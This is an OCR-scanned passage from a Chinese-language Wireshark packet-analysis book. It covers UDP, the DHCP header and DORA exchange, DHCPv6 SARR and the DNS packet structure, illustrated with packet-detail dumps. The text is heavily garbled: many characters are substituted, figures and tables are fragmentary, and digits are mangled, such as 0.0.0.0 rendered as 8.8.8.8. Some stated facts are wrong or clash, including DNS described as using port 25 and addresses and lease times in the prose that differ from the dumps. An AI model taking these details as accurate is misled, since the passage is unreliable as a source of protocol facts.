校 验 和 : 用 来 确保 UDP 头 和 数据 到 达 时 的 完整 性 。 


用 户 数据 报 协议 (UDP) 


RE 0 和 


aa Ta 
As 之 
oh an | Hao 
| ae | He 





图 8-12 ”UDP 报头 


文件 udp_dnsrequest.pcapng 中 包含 有 一 个 数据 包 ， 这 个 数据 包 是 一 
个 使 用 UDP 的 DNS 请 求 。 当 展开 这 个 数据 包 的 UDP 头 时 ， 你 可 以 看 到 4 
个 域 ( 见 图 8-13) 。 


帮 Wireshark . Packet 1. udp_dnsrequest 





rame 1: 73 bytes on wire (584 bits), 73 bytes captured (584 bits) 

ernet II, Src: CompalCo b8:59:b1 (88:16:d4:b8:59:b1), Dst: CiscoInc 4b:c8:7f (806:12:88:4b:c8:7f) 
nternet Protocol Version 4, Src: 192.168.100.138，Dst: 192.168.106.1 
ser Datagram Protocol, Src Port: 1969 (1868), Dst Port: 53 (53) 

Source Port: 18608 

Destination Port: 53 


h: 39 
sum: 9x6d5a [validation disabled] 
m index: 8] 

main Name System (query) 











No.: I * Time: 0.000000 * Source: 192,168. 100.138 * Destination: 192,168.100,1 * Protoeol: DNS * Length: 73 ° Info: Standard query’ O180F A wireshark.org 








图 8-13 UDP 数据 包 的 内 容 非常 简单 


需要 记 住 的 是 ，UDP 并 不 关心 传输 的 可 菲 性 ， 所 以 任何 使 用 UDP 的 
应 用 在 必要 的 时 候 都 需要 采取 特殊 的 步骤 ， 保 证 可 靠 的 传输 。 这 一 点 和 
TCP 相 反 ，TCP 有 自己 的 一 套 连 接 正 式 发 起 和 结束 的 程序 ， 也 有 自己 的 
一 些 机 制 来 校 验 数 据 包 的 成 功 传输 。 


这 一 章 向 你 介绍 了 传输 层 协议 一 一 TCP 和 UDP。 不 像 网 络 层 协 议 ， 
TCP 和 UDP 是 日 常 在 绝 大 多 数 网 络 上 交互 的 核心 ， 因 此 能 否 掌 握 有 效 分 
析 它 们 的 能 力 将 会 决定 你 能 否 成 为 一 位 数据 包 分 析 大 师 。 在 第 9 章 ， 我 
们 将 看 一 看 沿 见 的 应 用 层 协 议 。 





种 见 局 层 网 络 协议 


浊 
ul 
als 





在 这 一 草 中 ， 我 们 将 继续 介绍 一 些 协议 的 功能 ， 以 及 它们 在 
Wireshark 中 的 样子 。 我 们 将 介绍 4 种 常见 的 高 层 协议 〈 第 7 层 ) : 
DHCP、DNS、HTTP 和 SMTP。 


9.1 动态 主机 配置 协议 DHCP 


在 网 络 时 代 的 早期 ， 当 一 台 设 备 想 要 在 网 络 上 通信 时 ， 它 需要 航 手 
动 分 配 一 个 地 址 。 随 独 网 络 的 有 友 展 ， 这 样 的 手动 过 程 很 快 就 变 得 烦 珊 起 
来 。 为 了 解雇 这 个 问题 ，BOOTP 协 议 (Bootstrap Protocol) 问世 ， 它 主 
要 的 作用 是 给 连接 到 网 络 的 设备 目 动 分 配 地 址 。BOOTP 后 来 梓 更 加 复 
林 的 动态 主机 配置 协议 DHCP (Dynamic Host Configuration Protocol) 所 
人 


DHCP 是 一 个 应 用 层 协议 ， 负 责 让 设备 能 够 自动 获取 耳 地 址 〈 以 及 
其 他 重要 的 网 络 资源 ， 比 如 DNS 服务 磺 和 路 由 网 天 的 地 址 ) 。 今 天 大 多 
数 的 DHCP 服 务 礁 都 癌 客 户 靖 提 贷 其 他 的 一 些 参数 ， 比 如 网 络 上 的 灼 认 
网 天 和 DNS 服 务 絮 有 的 地 址 。 


9.1.1 DHCP 头 结构 


DHCP 数 据 包 会 为 客户 端 带 来 很 多 信息 。 如 图 9-1 所 示 ， 以 下 字段 都 
会 在 DHCP 数 据 包 中 出 现 。 


1 | 
\ 


Pe 
F 


清二 时 
客户 端 IP 地 址 


客 尸 端 硬件 地 址 {16 bytes] 


服务 器 主机 名 (64 bytes) 
启动 文件 [128 bytes) 


选项 





图 9-1 DHCP 数 据 包 结构 


操作 人 码 (OpCode) : 用 来 指出 这 个 数据 包 是 DHCP 请 求 还 是 DHCP 
回复 。 


便 件 类 型 〈Hardware Type) : 硬件 地 址 类 型 (10MB 以 太 网 、 
IEEE802、ATM 以 及 其 他 ) 。 


便 件 地 址 长 度 (Hardware Length) : 便 件 地 址 的 长 度 。 
跳 数 〈Hops) : 中 继 代 理 用 以 帮助 寻找 DHCP 服 务 右 。 
事务 ID 〈Transaction ID ) : 用 来 匹配 请 求 和 啊 应 的 一 个 随机 数 。 


消耗 时 | 间 (Seconds Elapsed) : 从 客户 器 第 一 次 同 DHCP 服 务 颖 友 
出 地 址 请 求 到 获得 啊 应 所 需要 的 时 间 。 


标志 (Flags〉: DHCP 和 客户 姗 能 够 接收 的 流量 关 型 〈 单 播 、 广 播 以 
及 其 他 ) 。 


客户 关 耳 地址 〈Cjlient IP Address) : 客户 闹 的 IP 地 址 (由 “你 
的 IP 地址 域 派 生 )〉。 


“你 的 ?TIP 地 址 (Your IP Address) : DHCP 服 务 器 提供 的 IP 地 址 
(最 终 成 为 猴 尸 线 IP 地 址 域 的 值 〉。 


服务 器 IP 地 址 (Server IP Address) : DHCP 服 务 器 的 IP 地 址 。 
网 天 IP 地 址 (Gateway IP Address) : 网 络 默认 网 关 的 卫 地 址 。 


容 户 病 便 件 地 址 (Client Hardware Address) : 客户 端的 MAC 地 
址 。 


服务 器 主机 名 (Server Host Name) : 服务 器 的 主机 名 (可 选 )。 
启动 文件 (Boot File) : DHCP 所 使 用 的 启动 文件 (可 选 )。 
选项 COptions) : 用 来 对 DHCP 数 据 包 进行 扩展 ， 以 提供 更 多 功 


CU 
CC 


9.1.2 DHCP 续 租 过 程 


DHCP 的 主要 任务 驶 是 在 续 租 过 程 中 同 各 户 桨 分 配 卫 地 址 。 续 租 过 
程 在 一 个 客户 疹 和 DHCP 服 务 左 之 间 进 行 ， 如 文件 
dhcp_nolease_renewal.pcap 中 所 示 。DHCP 的 续 租 过 程 通 第 被 称 为 DORA 
过 程 ， 因 为 它 使 用 了 4 种 类 型 的 DHCP 数 据 包 : 发 现 (Discover) 、 提 供 
(Offer) 、 请 求 〈Request) 和 确认 (Acknowledgement) ， 如 图 9-2 所 
示 。 在 这 里 ， 我 们 将 对 DORA 数 据 包 的 每 种 类 型 进行 逐一 介绍 。 





DHCP 服 务 器 


图 9-2 DHCP 的 DORA 过 程 


1. 发 现 数据 包 


正如 在 引用 的 捕获 文件 中 看 到 的 那样 ， 第 一 个 数据 包 从 0.0.0.0 的 68 
痛 口 友 往 255.255.255.255 的 67 背 口 。 各 户 关 使 用 0.0.0.0， 证 因为 它 目前 
还 没有 IP 地 址 。 数 据 包 被 发 往 255.255.255.255， 是 因为 这 是 一 个 独立 于 
网 络 的 广播 地 址 ， 从 而 人 确保 这 个 数据 包 会 被 发 往 网 络 上 的 每 台 设 备 。 
为 这 人 台 设 备 并 不 知道 DHCP 服 务 器 的 地 址 ， 所 以 它 的 第 一 个 数据 包 是 为 
了 寻找 正在 监听 的 DHCP 服 务 器 。 


在 Packet Details 面 板 中 ， 我 们 第 一 眼 束 可 以 看 到 DHCP 是 基于 UDP 
作为 传输 层 协议 的 。DHCP 对 于 客户 疾 得 到 其 所 请 求 信 息 的 速度 有 很 高 
的 要 求 。 由 于 DHCP 有 其 内 置 的 保证 可 靠 性 的 方法 ， 因 此 也 就 意味 着 
UDP 是 比较 适合 的 协议 。 你 可 以 在 第 一 个 数据 包 的 Packet Details 面 板 的 
DHCP 部 分 ， 碍 看 发 现 过 程 的 细 和 ， 如 图 9-3 所 示 。 


是 Wireshark . Packet 1. dhcp_nolease_renewal 


> Frame 1: 342 bytes on wire (2736 bits), 342 bytes captured (2736 bits) on interface 日 
> Ethernet IIT, Src: Vmware 59:fd:21 (99:9c:29:59:fd:21)，Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
> Internet Protocol Version 4, Src: 8.0.0.9, Dst: 255.255.255.255 
> User Datagram Protocol, Src Port: bootpc (68), Dst Port: bootps (67) 
Y Bootstrap Protocol (Discover) 

Message type: Boot Request (1) ©@ 

Hardware type: Ethernet (8x81) 

Hardware address length: 6 

Hops: 8 

Transaction ID: Bx696ddc66 

Seconds elapsed: 9 

Bootp flags: 8x8888 (Unicast) 

Client IP address: 8.8.8.8 

Your (client) IP address: 8.8.8.8 

Next server IP address: 8.8.8.8 

Relay agent IP address: 8.8.8.8 

Client MAC address: Vmware 59:fd:21 (88:8c:29:;59:fd:21) 

Client hardware address padding: 888008080880008800889 

Server host name not given 

Boot file name not given 

Magic cookie: DHCP 

Option: (53) DHCP Message Type (Discover) © 

Length: 1 
DHCP Discover (1) 
> Option: (58) Requested IP Address 

Option: (12) Host Name 

Option: (55) Parameter Request List 

Option: (255) End 

Padding: 


No.: 1 " Time: .O00000 * Source: 0.0.0.0 " Destination: 255.295.255.255 * 有 DC DHCP " Intfo: DHCP Discover - Transaction ID Oh595cbk55 





图 9-3 ”DHCP 发 现 数据 包 








这 是 一 个 请 求 数 据 包 ， 在 消 居 类 型 域 中 标识 为 1。 友 现 数 据 包 中 的 
大 多 数字 段 或 者 为 空 〈 就 像 是 IP 地 址 域 》; 或 者 根据 上 一 节 所 列 出 的 
DHCP 人 字段， 就 已 经 解释 的 很 清楚 了 。 这 个 数据 包 的 主要 内 容 是 这 4 个 字 
段 。 


DHCP 消 息 类 型 : 这 里 的 选项 类 型 为 53 (t=53) ， 长 上 度 为 1， 它 的 
值 为 1。 这 些 值 表明 这 是 一 个 DHCP 发 现 数据 包 。 


客户 凯 标 识 符 : 这 里 提供 了 和 客户 站 请 求 耻 地 址 的 额外 信息 。 


所 请 求 耳 地址 : 这 里 提供 了 客户 问 硕 望 得 到 的 卫 地 址 〈 通 第 是 之 前 
用 过 的 也 地 址 ) 。 


请 求 参 数列 表 : 这 里 列 出 了 客户 站 布 望 从 DHCP 服 务 硕 接收 到 的 不 
辣 配 置 项 《其 他 重要 网 络 设备 的 下地 址 ) 。 


2. 所 代数 据 包 


这 个 文件 的 第 二 个 数据 包 在 IP 头 中 列 出 了 可 用 的 IP 地 址 ， 显 示 这 个 
数据 包 从 192.168.0.1 发 往 192.168.0.10， 如 图 9-4 所 示 。 因 为 客户 端 实 际 
上 还 没有 192.168.0.10 这 个 地 址 ， 所 以 服务 器 会 首先 尝试 使 用 由 ARP 提 供 
的 客户 端 人 硬件 地 址 与 之 通信 。 如 果 通 信和 失败 ， 那 么 它 将 会 直接 将 提供 

(Offer) 广播 出 去 ， 进 行 通 信 。 


第 二 个 数据 包 的 DHCP 部 分 ， 称 为 所 供 数 据 包 ， 表 明 这 是 一 个 啊 应 
的 消 且 类 型 。 这 个 数据 包 包 含 了 和 前 一 个 数据 包 相 同 的 事务 ID， 也 束 古 
告诉 我 们 这 个 啊 应 与 我 们 原先 的 请 求 相对 应 。 


该 提供 数据 包 由 DHCP 服 务 器 发 出 ， 用 以 同 客 户 端 提供 其 服务 。 它 
提供 了 关于 其 自身 的 信息 ， 以 及 它 想 要 给 客户 端 提供 的 地 址 。 图 9-4 
中 ， 在 “你 的 ”客户 疹 ) IP 地 址 字段 中 的 IP 地 址 192.168.0.10 束 是 要 提供 
给 客户 端的 。 下 一 个 服务 器 卫 地 址 (Next Server IP Address) 域 中 的 值 
192.168.0.1 表 明 我 们 的 DHCP 服 务 喜 与 默认 网 关 共 部 一 个 了 地 址 。 


列 出 的 第 一 个 选项 指明 这 个 数据 包 和 是 一 人 台 DHCP 服 务 厚 提供 的 。 服 
务 兹 所 提供 的 接 下 来 的 这 些 选 项 和 客户 病 的 了 地址 ， 一 起 给 出 了 它 所 能 
提供 的 籁 外 信息 。 你 可 以 看 到 它 给 出 了 如 下 信息 。 


顾 Wireshark. packet 2 .dhcp_nolease_renewal 





Frame 2: 344 bytes on Wire (2752 bits), 344 bytes captured (2752 bits) on interface 8 
Ethernet II, Src: Vmware_c9:60:a4 (60:0c:;29:c8:68:a4), Dst: Vmware 59:fd:21 (680:0c:29:59:fd:21) 
Internet Protocol Version 4, Src: 192.168.1.5, Dst: 192.168.1.18 
User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68) 
Bootstrap Protocol (Offer) 
Message type: Boot Reply (2) @ 
Hardware type: Ethernet (8x81) 
Hardware address length: 6 
Hops: 8 
Transaction ID: 89x696ddc66 ©@ 
Seconds elapsed: 9 
Bootp flags: 8x8888 (Unicast) 
Client IP address: .89.8.8 
@ Your (client) IP address: 192.168.1.18 
@ Next server IP address: 192.168.1.5 
Relay agent IP address: 0.0.9.0 
Client MAC address: Vmware 59:fd:21 (88:8c:29:59:fd:21) 
Client hardware address padding: BCBBDDBBBDBDDBDBDDBDO 
server host name not given 
Boot file name not given 
Magic cookie: DHCP 
Option: (53) DHCP Message Type (0ffer) © 
Length: 1 
DHCP: Offer (2) 
Option: (54) DHCP Server Identifier 
Length: 4 
DHCP Server Identifier: 192.168.1.5 
Option: (51) IP Address Lease Time 
Length: 4 
IP Address Lease Time: (688s) 18 minutes 
Option: (1) Subnet Mask 
Length: 4 
Subnet Mask: 255.255.255. 
Option: (28) Broadcast Address 
Length: 4 
Broadcast Address: 192.168.1.255 
Option: (3) Router 
Length: +4 
Router: 192.168.1.254 
Option: (15) Domain Name 
Length: 16 
Domain Name: mydomain.example 
Option: (6) Domain Name Server 
Length: 8 
Domain Name Server: 192.168.1.1 
Domain Name Server: 192.168.1.2 
Option: (255) End 
Option End: 255 


No.: 2 " Time: 1.002288 * Source: 192,168.1.5 * Destination’ 192.168.1.10 ° Protoeol: DHCP : Infor DHCP Ofer - Transaction ID 595cbcc55 


| Hep 





图 9-4 ”DHCP 提供 数据 包 


子 网 掩 码 是 255.255.255.0。 

续 租 时 间 是 30min 。 

重新 绑 定 时 间 的 值 是 52min30s。 

IP 地 址 的 租 期 是 th。 

DHCP 服 务 器 的 标识 符 是 192.168.0.1。 


3. 请 求 数 据 包 


在 客户 端 接收 到 DHCP 服 务 咒 的 提供 数据 包 之 后 ， 它 将 以 一 个 
DHCP 请 求 数 据 包 作为 接收 确认， 如 图 9-5 所 示 。 


是 Wireshark .Packet 3. dhcp_nolease_renewal 


》 Frame 3: 342 bytes on wire (2736 bits), 342 bytes captured (2736 bits) on interface 68 
> Ethernet II, Src: Vmware 59:fd:21 (88:8c:29:59:fd:21), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
Internet Protocol Version 4, Src: 0.0.90.9，Dst: 255.255.255.255 和 0 
> User Datagram Protocol, src Port: bootpc (68), Dst Port: bootps (67) 
YY Bootstrap Protocol (Request) 
Message type: Boot Request (1)©@ 
Hardware type: Ethernet (@x81) 
Hardware address length; 6 
Hops: 8 
Transaction ID: 9x696ddc66 © 
Seconds elapsed: 8 
> Bootp flags: 9xBBBB (Unicast) 
Client IP address: 8@.8.8.8 
Your (client) IP address: 8.09.9.9 
Next server IP address: 8.8.8.¢ 
Relay agent IP address: 8.08.8.8 
Client MAC address: Vmware 59:fd:21 (88:8c:29:;59:1d:;21) 
Client hardware address padding: 0888860008880000000008 
Server host name not given 
Boot file name not given 
Magic cookie: DHCP 
Y Option: (53) DHCP Message Type (Request) @ 
Length: 1 
DHCP: Request (3) 
Y Option: (54) DHCP Server Identifier 
Length: 44 
DHCP Server Identifier: 192.168.1.5 © 
Y Option: (58) Requested IP Address 
Length: 4 
Requested IP Address: 192.168.1.19 
vY Option: (12) Host Name 
Length: 7 
Host Name: ubuntu2 
> Option: (55) Parameter Request List 
Y Option: (255) End 
Option End: 255 
Padding: 


No,: 3 * Timer 1,002980 * Source; O.0.0.0 * Destination: 255.255,.255,.255 * Protoeol: DHCP * Intor DHCP Request - Transaction ID NI5occ55 





图 9-5 ”DHCP 请 求 数据 包 


这 个 捕获 文件 中 的 第 三 个 数据 包 仍 然 从 IP 地 址 0.0.0.0 处 友 出 ， 因 为 
我 们 还 没有 完成 获取 IP 地 址 的 过 程 。 但 数据 包 现 在 知道 了 它 所 要 通信 的 
DHCP 服 务 器 。 


消 轧 类 型 字段 显示 这 是 一 个 请 求 数 据 包 。 虽 然 这 个 捕获 文件 上 的 每 
个 数据 包 都 属于 同一 个 续 租 过 程 ， 但 因为 这 是 一 个 新 的 请 求 / 啊 应 过 
程 ， 所 以 它 有 了 一 个 新 的 事务 ID 。 这 个 数据 包 与 发 现 数据 包 相 似 ， 其 所 
有 的 卫 地 址 信息 都 是 空 的 。 


在 最 后 的 选项 域 ， 我 们 看 到 这 是 一 个 DHCP 请 求 。 人 得 注意 的 是 ， 
这 个 所 要 请 求 的 IP 地 址 不 再 是 空 ， 并 且 DHCP 服 务 弟 标识 从 域 也 填 有 IP 
地 址 。 


4. 人 确认 数据 包 


这 个 过 程 的 最 后 一 步 束 是 DHCP 在 确认 数据 包 中 给 客户 咽 友 壕 其 所 
请 求 的 IP 地 址 ， 并 在 其 数据 库 中 记录 相关 信息 ， 如 图 9-6 所 示 。 


顾 Wireshark . Packet 4 , dhcp_nolease_renewal 





> Frame 4: 344 bytes on wire (2752 bits), 344 bytes captured (2752 bits) on interface @ 
> Ethernet II, Src: Vmware ce:69:a4 (80:8c:29:c0:68:a4), Dst: Vmware S59:fd:21 (8@0:8c:29:59:fd:21) 
> Internet Protocol Version 4, Src: 192.168.1.5, Dst: 192.168.1.19 
> User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68) 
Y Bootstrap Protocol (ACK) 
Message type: Boot Reply (2) 
Hardware type: Ethernet (@x81) 
Hardware address length: 6 
Hops: 8 
Transaction ID: 9x696ddc66 
Seconds elapsed: 8 
> Bootp flags: 8@x8888 (Unicast) 
Client IP address: 9.9.0.0 
Your (client) IP address: 192.168.1.19 
Next server IP address: 192.168.1.5 
Relay agent IP address: 8.9.90.9 
Client MAC address: Vmware 59:fd:21 〔〈98:6c:29:59:fd:21) 
Client hardware address padding: 90D0690D00DDDD0DB60D 
Server host name not given 
Boot file name not given 
Magic cookie: DHCP 
> Option: (53) DHCP Message Type (ACK) 
> Option: (54) DHCP Server Identifier 
> Option: (51) IP Address Lease Time 
> Option: (1) Subnet Mask 
> Option: (28) Broadcast Address 
> Option: (3) Router 
> Option: (15) Domain Name 
> Option: (6) Domain Name Server 
> Option: (255) End 








No.s 4 “ Timer’ 1.005243 - Source’ 192,168.1.5 " Destination: 192.168.1,10 * Protoeol DHCP « Info: DHCP ACK - Transaction ID O6600EE 


[rep | 





图 9-6 DHCP 确认 数据 包 
这 时 客户 端 就 有 了 一 个 IP 地 址 ， 并 且 可 以 用 它 在 网 络 上 通信 ， 


9.1.3 DHCP 租 约 内 续 租 


当 DHCP 给 一 台 设 备 分 配 了 一 个 IP 地 址 时 ， 它 同时 也 给 客户 端 定 下 
了 一 个 租约 。 也 吏 是 说 客 己 器 在 有 限 的 时 间 之 内 只 用 这 个 下地 址 ， 人 否则 
就 必须 续 租 。 我 们 刚刚 介绍 的 DORA 过 程 是 出 现在 客户 端 第 一 次 获取 IP 


地 址 或 者 其 租约 时 间 已 经 过 期 的 情况 下 。 在 这 两 种 情况 下 ， 这 合 设 备 都 
会 羽 视 为 租约 过 期 。 


当 一 个 拥有 耳 地 址 的 客户 病 在 租约 内 重新 司 动 时 ， 它 必须 进行 一 次 
精简 原 的 DORA 过 程 ， 来 重新 认领 它 的 下地 址 。 这 个 过 程 被 称 为 租约 内 
续 租 。 


在 租约 内 续 租 时 ， 有 发 现 和 提供 数据 包 残 变 得 没有 必要 了 。 将 租约 内 
续 租 看 作 十 租约 过 期 续 租 中 使 用 的 同 种 DORA 过 程 ， 可 以 有 友 现 在 租约 内 
续 租 并 不 需要 那么 做 ， 而 只 需 完 成 请 求 和 确认 两 个 步 又 就 可 以 了 。 你 可 
以 在 文件 dhcpinlease renewal.pcap 中 看 到 租约 内 续 租 的 一 个 捕获 样 例 。 


9.1.4 DHCP 选项 和 消 奶 类 型 


DHCP 依 赖 于 其 可 选项 来 提供 真正 的 灵活 性 。 正 如 你 所 看 到 的 那 
样 ， 数 据 包 的 DHCP 选 项 在 大 小 和 内 容 上 痢 可 以 变化 。 数 据 包 的 整体 大 
小 则 取决 于 其 所 使 用 的 选项 。 


所 有 DHCP 数 据 包 都 需要 的 唯一 选项 殉 征 谢恩 闪 型 选项 《选项 
53) 。 这 个 选项 标识 看 DHCP 客 尸 问 或 者 服务 此 将 如 何 处 理 数 据 包 中 的 
信息 。 在 表 9-1 中 给 出 了 所 定义 的 8 种 消 明 类型。 


表 9-1 DHCP 消 息 类 型 








5 ACK 服务 右 问 客户 问 友 送 所 请 求 的 配置 参数 


客户 闹 问 服务 右 拒 绝 其 配置 参数 的 请 求 


客户 冲 问 服务 右 通 过 取消 配置 参数 来 取消 租约 


当 冤 户 问 已 经 有 IP 地 址 时 客户 器 问 服务 砷 请求 配 置 参 数 





9.1.5 DHCP Version6 (DHCPv0) 


如 果 按 照 表 9-1 对 DHCP 数 据 包 结构 的 定义 ， 你 会 发 现 结 构 体 中 没有 
为 IPv6 地 址 提供 是 够 的 空间 。 为 了 解决 这 一 问题 ， 同 时 叉 不 对 DHCP 协 
议 进行 改动 ， 在 RFC3315 中 提出 了 DHCPvV6 协 议 。 由 于 DHCPv6 丰 是 基 
于 BOOTP 协 议 DHCP 协议 的 前 映 ) 设计 的 ， 因 此 DHCPvV6 的 数据 包 结 
构 要 比 DHCP 协 议 精 简 很 多 〈 见 图 9-7) 。 


动态 主机 配置 协议 Version 6 (DHCPv6) 


WE 0 | | | 7 | 3 





图 9-7 DHCPVv6 数 据 包 结构 


如 图 9-7 所 示 ，DHCPv6 数 据 包 结构 仅 包 售 2 个 固定 字段 ， 其 作用 与 
DHCP 中 的 类 似 字 上 段 相 同 。 数 据 包 的 其 他 部 分 取决 于 位 于 第 一 个 字 节 的 
消 忆 类型。 在 选项 部 分 ， 每 个 选项 由 一 个 2 字 节 的 选项 码 和 一 个 长 度 为 2 
字 节 的 选项 值 字段 组 成 。 


DHCPv6 实 现 了 和 DHCP 相 同 的 功能 ， 但 要 理解 DHCPv6 通 信 ， 我 们 
必须 把 DORA 〈Discover 一 Offer-- Request- 一 Acknowledgment) 和 蔡 换 为 
SARR (Solicit 一 Advertise 一 Request 一 Reply); 。 这 一 过 程 如 网 9-8 所 示 ， 
描述 了 客户 痪 的 续 租 流程 。 


DHCPv6 客 户 端 DHCPv6 服 务 器 


图 9-8 DHCPv6 SARR 续 租 过 程 
SARR 过 程 包括 以 下 4 个 步 又 。 


(1) 发 起 〈Solicit) : 客户 关 回 一 个 特定 的 组 播 地 址 〈ff02::1:2 ) 
发 送 一 个 初始 化 数据 包 ， 尝 试 在 网 络 上 发 现 可 用 的 DHCPvV6 服 务 器 。 


(2) 公告 〈《Advertise) : 一 个 可 用 的 DHCPv6 服 务 需 直接 回复 客户 
背 ， 衣 明 此 服务 硕 能 够 提供 地 址 分 配 和 设置 服务 。 


(3) 请 求 (Request) : 客户 闹 通 过 组 播 方式 回 服 务 占 发 起 地 址 配 
置信 息 请 求 。 


(4) 回复 (Reply) : 服务 需 同 客户 痕 直 接 发 送 其 请 求 的 所 有 配置 
信息 ，SARR 过 程 完 成 。 





SARR 过 程 的 概要 如 图 9-9 所 示 ， 这 部 分 数据 包 从 dhcp6outiease 

acquisition.pcapng 中 提取 。 在 这 个 例子 中 ， 一 台独 接 入 网 络 的 主机 

(fe80::20c:29ff: fe5e:7744) 按照 SARR 过 程 ， 从 DHCPvV6 服 务 器 

(Cfe80::20c:29ff:felf:a755) 获取 配置 信息 。 每 一 个 数据 包 代 表 了 SARR 
过 程 中 的 一 个 步骤 ， 其 中 ， 初 始 的 Solicit (发 起 ) 和 advertise 〈 公 告 ) 数 
据 包 的 事务 ID 为 0x9de03f，request《〈 请 求 ) 和 reply〈 回 复 ) 数据 包 的 事 
务 ID 为 0x2d1603。 这 个 通信 过 程 使 用 546 和 547 问 口 ， 这 两 个 靖 口 是 
DHCPv6 使 用 的 标准 端口 。 





No Time Source Destnation Protocol Length Info 

10.. fe80::20c:29ff:feSe:7744 ff02::1:2 DHCPv6 118 Solicit XID: 9x9de63f CID: 8881888611def69bd888c295e7744 

“2 人 fe80::20c:29ff:feif:a755 feB0::20c:29ff:feSe:7744 DHCPv6 166 Advertise XID: @x9de83f CID: 888188811def69bd888c295e7744 IAA: 2881:db8:1:2::1882 

LL 3 1..。fe86::26c:29ff:fe5e:7744 ”ff62::1:2 DHCPv6 164 Request XID: 8x2d1683 CID: 096691966911def69bd6966c295e7744 IAA: 2061:db8:1:2::10962 
4 1.. fe80::20c:29ff:feif:a755  fe80: :20c:29ff:fe5e:7744 DHCPv6 166 Reply XID: 8x2d1683 CID: 0966196911def69bd686c295e7744 IAA: 28861:db8:1:2::1882 





、 


寸 DHCPv6 获 得 一 个 IPv6 地 址 
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忌 的 来 说 ，DHCPV6 和 DHCP 的 数据 包 结 构 有 很 大 区 列 ， 但 是 在 功 
能 实现 思 跤 上 是 一 人 怪 的 。 这 个 过 程 仍然 包括 DHCP 服 务 妖 发 现 步 又 和 正 
式 的 配置 信息 获取 步 又 。 这 些 事 件 通 过 客户 端 和 服务 嚣 之 间 交 互 数 据 包 
中 的 事务 ID 进行 关联 。 传 统 的 DHCP 机 制 不 支持 IPv6 地 址 分 配 ， 因 此 ， 
如 果 你 的 设备 能 够 从 网 络 中 的 某 个 服务 器 目 动 获取 IPv6 地 址 ， 则 这 表明 
你 的 网 络 中 已 经 在 运行 DHCPv6 服 务 。 如 果 你 想 要 进一步 比较 DHCP 和 
CE 我 们 建议 你 使 用 抓 包 工具 在 客户 病 和 服务 右 关 逐步 进行 分 


9.2 ”域名 系统 


域名 系统 (Domain Name System, DNS) 是 最 重要 的 互联 网 协议 之 
一 ， 因 为 它 是 众所周知 的 备 合 刑 。DNS 将 例如 Google 的 域名 和 
74.125.159.99 的 卫 地 址 捆绑 起 来 。 当 我 们 想 要 和 一 台 网 络 设备 通 信 却 不 
知道 它 的 卫 地 址 时 ， 就 可 以 使 用 它 的 DNS 名 字 来 进行 访问 。 


DNS 服 务 器 存储 了 一 个 有 着 IP 地 址 和 和 DNS 名字 映射 资源 记录 的 数据 
库 ， 并 将 其 和 客户 端 以 及 其 他 DNS 服务 器 共享 。 


| 注 喜 有 


由 于 DNS 服务 磺 的 结构 很 复杂 ， 因 此 我 们 只 关注 于 通 帝 类 型 的 DNS 流量 。 





9.2.1 DNS 数据 包 结 构 


如 图 9-10 所 示 ，DNS 数 据 包 和 我们 之 醒 所 看 到 的 数据 包 类 型 结构 有 
所 不 同 。DNS 数 据 包 中 会 出 现下 面 的 一 些 域 。 


域名 系统 {DN5) 


War oo Ta 和 TI 
oh aso |g] wr AI 2 | We 


| Wem | 





图 9-10 “DNS 数据 包 结 构 
DNS ID 号 (DNS ID Number) : 用 来 对 应 DNS 查询 和 DNS 啊 应 。 


查询 / 啊 应 “(Query/Response, QR) : 用 来 指明 这 个 数据 包 是 DNS 
丛 询 还 是 啊 应 。 


操作 人 码 (OpCode)〉 : 用 来 定义 疹 明 中 请 求 的 类 型 。 


权威 应 答 (Authoritative Answer, AA) : 如 果 啊 应 数据 包 中 设 定 
了 这 个 值 ， 则 说 明 这 个 啊 应 是 由 域内 权威 域名 服务 占 发 出 的 。 


截断 (Truncation, TC) : 用 来 指明 这 个 啊 应 由 于 太 长 ， 无 法 装 入 
数据 包 而 被 截 靳 。 

期 望 递归 (Recursion Desired, RD ) : 如 果 在 请 求 中 设 定 了 这 个 
值 ， 则 说 明 DNS 客 户 疹 在 目标 域名 服务 喜 不 含有 所 请 求 信息 的 情况 下 ， 
要 求 进行 递归 奏 询 。 


可 用 递归 (Recursion Available, RA) : 如 果 啊 应 中 设 定 了 这 个 
值 ， 则 说 明 域 名 服务 器 文 持 递归 奉 询 。 


保留 (Z) : 在 RFC1035 的 规定 中 被 设 为 全 0， 但 有 时 会 被 用 来 作为 
RCode 域 的 扩展 。 


啊 应 但 (Response Code) : 在 DNS 啊 应 中 用 来 指明 错误 。 
问题 计数 〈Question Count) : 在 问题 区 段 中 的 条 目 数 。 
回答 计数 (Answer Count) : 在 回答 区 段 中 的 条 目 数 。 


域名 服务 器 计数 (Name Server Count) : 在 权威 区 段 的 域名 资源 
记录 数 。 

额外 记录 计数 (Additional Records Count) : 在 额外 信息 区 段 中 
的 其 他 资源 记录 数 。 


问题 区 段 〈Question section ) : 大 小 可 变 、 包 售 要 被 发 送 到 DNS 服 
务 器 的 一 条 或 多 条 的 信息 查询 的 部 分 。 


回答 区 段 〈Answer section) : 大 小 可 变 、 包 含 用 来 回答 僵 询 的 一 
条 或 多 条 资源 记录 。 


权威 区 段 〈Authority section ) : 大 小 可 变 、 包 含 指 癌 权 威 域名 服 
务 划 的 资源 记录 ， 用 以 继续 解析 过 程 。 


条 外 信息 区 段 (Additional Information section ) : 大 小 可 变 、 包 
侣 与 租 询 有 关 的 额外 信息 ， 但 对 于 回答 答 询 这 并 不 是 绝对 必要 的 资源 记 
了 条。 


9.2.2 ”一 次 简单 的 DNS 答 询 过 程 


DNS 以 得 询 / 啊 应 的 模式 工作 。 当 一 个 客户 端 想 要 将 一 个 DNS 名 字 
解析 成 卫 地 址 时 ， 它 会 同 DNS 服务 需 发 送 一 个 查询 ， 然 后 服务 右 在 啊 应 
中 提供 所 请 求 的 信息 。 在 较 简 单 的 情形 下 ， 这 个 过 程 包含 着 两 个 数据 
包 ， 正 如 在 捕获 文件 dns_query_response.pcap 中 所 看 到 的 那样 。 


第 一 个 数据 包 如 图 9-11 所 示 ， 是 由 192.168.0.114 的 客户 疹 通 过 DNS 
的 标准 25 端 口 发 向 205.152.37.23 的 服务 器 的 DNS 查询 。 


当 检 和 奏 这 个 数据 包 的 头 部 时 ， 你 会 发 现 DNS 也 是 基于 UDP 协议 的 。 


在 数据 包 的 DNS 区 段 ， 你 可 以 看 到 数据 包 开 头 的 一 些 较 小 域 都 家 
